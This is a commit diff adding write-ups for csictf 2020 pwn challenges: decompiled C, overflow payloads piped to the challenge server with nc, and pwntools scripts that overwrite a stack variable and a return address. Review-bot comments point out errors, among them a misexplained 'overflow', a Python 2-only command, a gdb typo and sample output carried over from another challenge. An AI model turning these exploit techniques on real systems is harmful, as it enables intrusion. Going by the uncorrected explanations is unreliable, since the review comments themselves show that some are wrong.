rishitsaiya
4 years ago
11 changed files with 297 additions and 0 deletions
@ -0,0 +1,10 @@ |
|||
## Global Warming |
|||
The main idea finding the flag is `%n` exploit. |
|||
|
|||
#### Step-1: |
|||
|
|||
https://github.com/crypt0n1te/Write-Ups/blob/master/csictf-2020/pwn/global-warming.md |
|||
|
|||
#### Step-5: |
|||
Finally the flag becomes: |
|||
`csictf{n0_5tr1ng5_@tt@ch3d}` |
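Review bot: Step-1 of global-warming.md contains nothing but a link to a third-party write-up, and Steps 2 through 4 are absent, so the section states the `%n` idea and the final flag with none of the reasoning in between; either fill in the steps (which format-string primitive is used, what is overwritten, what the payload looks like) or say explicitly that the solution follows the linked write-up and credit it. The opening sentence also needs a verb: "The main idea behind finding the flag is a `%n` exploit."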
@ -0,0 +1,84 @@ |
|||
## Secret Society |
|||
The main idea finding the flag is Buffer Overflow. |
|||
|
|||
#### Step-1: |
|||
After I downloaded `secret-society`, I reversed it with IDA, I got this source code: |
|||
|
|||
**main()** function: |
|||
```c |
|||
undefined8 main(void) |
|||
{ |
|||
size_t sVar1; |
|||
undefined8 local_d8 [2]; |
|||
undefined4 uStack200; |
|||
undefined auStack196 [108]; |
|||
char local_58 [56]; |
|||
FILE *local_20; |
|||
char *local_18; |
|||
__gid_t local_c; |
|||
|
|||
setvbuf(stdout,(char *)0x0,2,0); |
|||
local_c = getegid(); |
|||
setresgid(local_c,local_c,local_c); |
|||
memset(local_58,0,0x32); |
|||
memset(local_d8,0,0x80); |
|||
puts("What is the secret phrase?"); |
|||
fgets((char *)local_d8,0x80,stdin); |
|||
local_18 = strchr((char *)local_d8,10); |
|||
if (local_18 != (char *)0x0) { |
|||
*local_18 = '\0'; |
|||
} |
|||
sVar1 = strlen((char *)local_d8); |
|||
*(undefined8 *)((long)local_d8 + sVar1) = 0x657261206577202c; |
|||
*(undefined8 *)((long)local_d8 + sVar1 + 8) = 0x6877797265766520; |
|||
*(undefined4 *)((long)&uStack200 + sVar1) = 0x2e657265; |
|||
auStack196[sVar1] = 0; |
|||
local_20 = fopen("flag.txt","r"); |
|||
if (local_20 == (FILE *)0x0) { |
|||
printf("You are a double agent, it\'s game over for you."); |
|||
/* WARNING: Subroutine does not return */ |
|||
exit(0); |
|||
} |
|||
fgets(local_58,0x32,local_20); |
|||
printf("Shhh... don\'t tell anyone else about "); |
|||
puts((char *)local_d8); |
|||
return 0; |
|||
} |
|||
|
|||
``` |
|||
|
|||
#### Step-2: |
|||
So, basically I had to overflow 3 buffers in above code `local_d8 (16 bytes, our input buffer)`, `uStack200 (4 bytes)` & `auStack196 (108 bytes)` |
|||
|
|||
So I tried using Debugger to get the address of the flag. |
|||
|
|||
|
|||
```bash |
|||
echo flag > flag.txt |
|||
perl -e 'print "A"x16 . "B"x4 . "C"x108' | ./secret-society |
|||
``` |
|||
|
|||
I got this output: |
|||
|
|||
```bash |
|||
What is the secret phrase? |
|||
Shhh... don't tell anyone else about AAAAAAAAAAAAAAAABBBBCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC,flag |
|||
``` |
|||
|
|||
#### Step-3: |
|||
So, we just have to run this remotely on the web server. |
|||
|
|||
```bash |
|||
perl -e 'print "A"x16 . "B"x4 . "C"x108' | nc chall.csivit.com 30041 |
|||
``` |
|||
I got this output: |
|||
|
|||
```bash |
|||
What is the secret phrase? |
|||
Shhh... don't tell anyone else about AAAAAAAAAAAAAAAABBBBCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC,csivit{Bu!!er_e3pl01ts_ar5_5asy} |
|||
``` |
|||
Voila! I got the flag there. |
|||
|
|||
#### Step-4: |
|||
Finally the flag becomes: |
|||
`csivit{Bu!!er_e3pl01ts_ar5_5asy}` |
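Review bot: the "overflow 3 buffers" explanation in Step-2 does not match the decompiled main(): `fgets((char *)local_d8,0x80,stdin);` reads at most 127 bytes into the 128-byte region made up of local_d8, uStack200 and auStack196, so the A/B/C line fills it without overflowing anything. What leaks the flag is the suffix append: with sVar1 = 127 the comma is written to the last byte of that region, the rest of ", we are everywhere." and the zero from `auStack196[sVar1] = 0;` land inside local_58, and the later `fgets(local_58,0x32,local_20);` replaces them with the flag, so `puts((char *)local_d8);` runs straight from the input and the comma into local_58 because no null byte separates them. The ",flag" in the sample output confirms this; the write-up should describe it as a missing terminator rather than a buffer overflow.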
@ -0,0 +1 @@ |
|||
flag |
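Review bot: this flag.txt is the local test fixture created by `echo flag > flag.txt` in secret-society.md; it is harmless, but next to a committed challenge binary it can be mistaken for the real flag file. Consider dropping it from the commit or adding it to .gitignore.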
Binary file not shown.
@ -0,0 +1,53 @@ |
|||
## pwn intended 0x1 |
|||
The main idea finding the flag is Buffer Overflow. |
|||
|
|||
#### Step-1: |
|||
I reversed the file with Ghidra. |
|||
|
|||
```c |
|||
undefined8 main(void) |
|||
|
|||
{ |
|||
char local_38 [44]; |
|||
int local_c; |
|||
|
|||
local_c = 0; |
|||
setbuf(stdout,(char *)0x0); |
|||
setbuf(stdin,(char *)0x0); |
|||
setbuf(stderr,(char *)0x0); |
|||
puts("Please pour me some coffee:"); |
|||
gets(local_38); |
|||
puts("\nThanks!\n"); |
|||
if (local_c != 0) { |
|||
puts("Oh no, you spilled some coffee on the floor! Use the flag to clean it."); |
|||
system("cat flag.txt"); |
|||
} |
|||
return 0; |
|||
} |
|||
``` |
|||
|
|||
#### Step-2: |
|||
Clearly, this was a case for Buffer Overflow. |
|||
|
|||
A simple command to overflow the buffer would give us the flag. |
|||
|
|||
`python -c 'print"A"*45' | nc chall.csivit.com 30001` |
|||
|
|||
<i> The piping done other way round doesn't help though. </i> |
|||
|
|||
Output: |
|||
|
|||
```bash |
|||
Please pour me some coffee: |
|||
|
|||
Thanks! |
|||
|
|||
Oh no, you spilled some coffee on the floor! Use the flag to clean it. |
|||
csictf{y0u_ov3rfl0w3d_th@t_c0ff33_l1ke_@_buff3r} |
|||
``` |
|||
|
|||
Voila! There we have our flag. |
|||
|
|||
#### Step-3: |
|||
Finally the flag becomes: |
|||
`csictf{y0u_ov3rfl0w3d_th@t_c0ff33_l1ke_@_buff3r}` |
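Review bot: the command in Step-2, `python -c 'print"A"*45'`, only runs under Python 2; in Python 3 `print` is a function and this is a SyntaxError, so state the interpreter version or write `python3 -c 'print("A"*45)'`. Step-2 should also say why 45 works: local_38 is 44 bytes and local_c sits directly after it, so the 45th byte overwrites the low byte of local_c with 0x41 and the `local_c != 0` check passes (any non-zero byte would do). The italic remark "The piping done other way round doesn't help though." is unclear; either spell out which command order was tried and what happened, or drop it.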
Binary file not shown.
@ -0,0 +1,63 @@ |
|||
## pwn-intended-0x2 |
|||
The main idea finding the flag is overwrite the correct hex after padding. |
|||
|
|||
#### Step-1: |
|||
After I downloaded `pwn-intended-0x2`, I reversed it with IDA, I got this source code: |
|||
|
|||
```c |
|||
undefined8 main(void) |
|||
|
|||
{ |
|||
char local_38 [44]; |
|||
int local_c; |
|||
|
|||
local_c = 0; |
|||
setbuf(stdout,(char *)0x0); |
|||
setbuf(stdin,(char *)0x0); |
|||
setbuf(stderr,(char *)0x0); |
|||
puts("Welcome to csictf! Where are you headed?"); |
|||
gets(local_38); |
|||
puts("Safe Journey!"); |
|||
if (local_c == -0x35014542) { |
|||
puts("You\'ve reached your destination, here\'s a flag!"); |
|||
system("/bin/cat flag.txt"); |
|||
} |
|||
return 0; |
|||
} |
|||
``` |
|||
|
|||
#### Step-2: |
|||
`local_c` is checked for a hex value of `0xcafebabe`. Since the size of local array is 44, we have to write `0xcafebabe` after 44 bytes. |
|||
|
|||
#### Step-3: |
|||
I wrote a very common `rev_exploit.py` to pwn into the machine. |
|||
|
|||
```python |
|||
import pwn |
|||
|
|||
r = pwn.remote('chall.csivit.com', 30007) |
|||
|
|||
payload = "A"*44 + '\xbe\xba\xfe\xca' |
|||
|
|||
r.sendline(payload) |
|||
r.interactive() |
|||
``` |
|||
|
|||
#### Step-4: |
|||
When I finally ran this `python3 rev_exploit.py`, I got this output: |
|||
|
|||
```bash |
|||
[+] Opening connection to chall.csivit.com on port 30007: Done |
|||
[*] Switching to interactive mode |
|||
Welcome to csictf! Where are you headed? |
|||
Safe Journey! |
|||
You've reached your destination, here's a flag! |
|||
csictf{c4n_y0u_re4lly_telep0rt?}[*] Got EOF while reading in interactive |
|||
$ |
|||
[*] Interrupted |
|||
``` |
|||
Voila! I got the flag there. |
|||
|
|||
#### Step-5: |
|||
Finally the flag becomes: |
|||
`csictf{c4n_y0u_re4lly_telep0rt?}` |
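Review bot: Step-2 jumps from `local_c == -0x35014542` to `0xcafebabe` without showing the link; add one line noting that the decompiler prints the constant as a signed 32-bit int and that 0x100000000 - 0x35014542 = 0xcafebabe, and that the payload bytes `\xbe\xba\xfe\xca` are that value in little-endian order. Without this the reader cannot check the value against the decompiled comparison.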
Binary file not shown.
@ -0,0 +1,10 @@ |
|||
#!/usr/bin/env python3 |
|||
|
|||
import pwn |
|||
|
|||
r = pwn.remote('chall.csivit.com', 30007) |
|||
|
|||
payload = "A"*44 + '\xbe\xba\xfe\xca' |
|||
|
|||
r.sendline(payload) |
|||
r.interactive() |
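Review bot: the shebang selects python3 but `payload = "A"*44 + '\xbe\xba\xfe\xca'` is a str, so the payload reaches pwntools as text and is only turned into the intended bytes by its Latin-1 fallback, with a "Text is not bytes" warning; under a different `context.encoding` the 0xbe..0xca characters would be mangled. Build it as bytes, `b"A"*44 + pwn.p32(0xcafebabe)`, which also documents the target value instead of a hand-reversed escape sequence.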
@ -0,0 +1,76 @@ |
|||
## pwn-intended-0x3 |
|||
The main idea finding the flag is overwrite the correct hex after padding. |
|||
|
|||
#### Step-1: |
|||
After I downloaded `pwn-intended-0x3`, I reversed it with IDA, I got this source code: |
|||
|
|||
**main()** function: |
|||
```c |
|||
undefined8 main(void) |
|||
|
|||
{ |
|||
char local_28 [32]; |
|||
|
|||
setbuf(stdout,(char *)0x0); |
|||
setbuf(stdin,(char *)0x0); |
|||
setbuf(stderr,(char *)0x0); |
|||
puts("Welcome to csictf! Time to teleport again."); |
|||
gets(local_28); |
|||
return 0; |
|||
} |
|||
``` |
|||
|
|||
**flag()** function: |
|||
```c |
|||
void flag(void) |
|||
|
|||
{ |
|||
puts("Well, that was quick. Here\'s your flag:"); |
|||
system("cat flag.txt"); |
|||
/* WARNING: Subroutine does not return */ |
|||
exit(0); |
|||
} |
|||
``` |
|||
|
|||
#### Step-2: |
|||
I just had to write the address of the flag function after 32+8 bytes. |
|||
|
|||
So I tried using Debugger to get the address of the flag. |
|||
|
|||
```bash |
|||
echo into functions | gdb ./pwn-intended-0x3 | grep flag |
|||
``` |
|||
I got this output: `0x00000000004011ce flag` |
|||
|
|||
#### Step-3: |
|||
I wrote a very common `rev_exploit.py` to pwn into the machine. |
|||
|
|||
```python |
|||
import pwn |
|||
|
|||
r = pwn.remote('chall.csivit.com', 30013) |
|||
|
|||
payload = "A"*40 + '\xce\x11@\x00\x00\x00\x00\x00' |
|||
|
|||
r.sendline(payload) |
|||
r.interactive() |
|||
``` |
|||
|
|||
#### Step-4: |
|||
When I finally ran this `python3 rev_exploit.py`, I got this output: |
|||
|
|||
```bash |
|||
[+] Opening connection to chall.csivit.com on port 30013: Done |
|||
[*] Switching to interactive mode |
|||
Welcome to csictf! Time to teleport again. |
|||
Well, that was quick. Here's your flag: |
|||
You've reached your destination, here's a flag! |
|||
csictf{ch4lleng1ng_th3_v3ry_l4ws_0f_phys1cs}[*] Got EOF while reading in interactive |
|||
$ |
|||
[*] Interrupted |
|||
``` |
|||
Voila! I got the flag there. |
|||
|
|||
#### Step-5: |
|||
Finally the flag becomes: |
|||
`csictf{ch4lleng1ng_th3_v3ry_l4ws_0f_phys1cs}` |
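Review bot: the gdb command in Step-2, `echo into functions | gdb ./pwn-intended-0x3 | grep flag`, has a typo: the gdb command is `info functions`, and the non-interactive form `gdb -batch -ex 'info functions flag' ./pwn-intended-0x3` avoids both the pipe and the pager. Step-2 should also say where the "+8" comes from (the saved rbp between the 32-byte local_28 and the return address), and the payload reads more clearly as `b"A"*40 + pwn.p64(0x4011ce)` than as '\xce\x11@\x00\x00\x00\x00\x00', where "@" is 0x40. Finally, the sample output in Step-4 contains "You've reached your destination, here's a flag!", which neither main() nor flag() in the decompilation shown here prints; it appears to have been carried over from the 0x2 write-up.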
Binary file not shown.